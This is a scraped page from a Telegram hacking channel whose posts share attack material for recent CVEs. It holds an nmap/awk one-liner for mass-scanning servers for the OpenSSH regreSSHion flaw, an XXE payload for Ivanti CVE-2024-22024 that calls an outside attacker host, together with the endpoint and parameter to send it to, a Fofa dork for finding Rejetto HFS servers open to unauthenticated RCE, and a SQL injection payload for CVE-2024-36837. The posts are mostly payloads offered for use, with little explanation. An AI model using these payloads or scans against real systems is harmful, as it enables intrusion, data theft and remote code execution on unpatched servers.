Eʀᴏ ··ʜᴀᴄᴋ··
@EroHack0
4.84K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
About
Blog
Apps
Platform
Join
Eʀᴏ ··ʜᴀᴄᴋ··
4.84K subscribers
Eʀᴏ ··ʜᴀᴄᴋ··
📺 یک اسکریپت bash برای nmap برای اسکن ماشین‌های آسیب‌پذیر CVE-2024-6387 با توجه به ورژن آسیب پذیر OpenSSH

nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
    if ($5 >= "8.5p1" && $5 < "9.8p1") {
        status = "Vulnerable to CVE-2024-6387"
    } else if ($5 >= "4.4p1" && $5 < "8.5p1") {
        status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
    } else if ($5 < "4.4p1") {
        status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
    }
    if (status) {
        print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
        status = ""
    }
}'


#POC #CVE_2024_6387

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥72😐2
3.04K views
Eʀᴏ ··ʜᴀᴄᴋ··
💀CVE-2024-22024💀

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>


📺 send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm


#bugbountytips #cve #Ivanti
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯5💯3🗿1
3.79K views
Eʀᴏ ··ʜᴀᴄᴋ··
⭐️CVE-2024-23692 POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server

Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"


🌐Exploit

#Exploit #Cve #Poc

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💯2🔥1🎃1👾1
3.55K views
Eʀᴏ ··ʜᴀᴄᴋ··
🪱CVE-2024-36837 - SQLI Injection

🔪Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334


#CVE #SQLI #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5💯1🎃1
3.58K viewsedited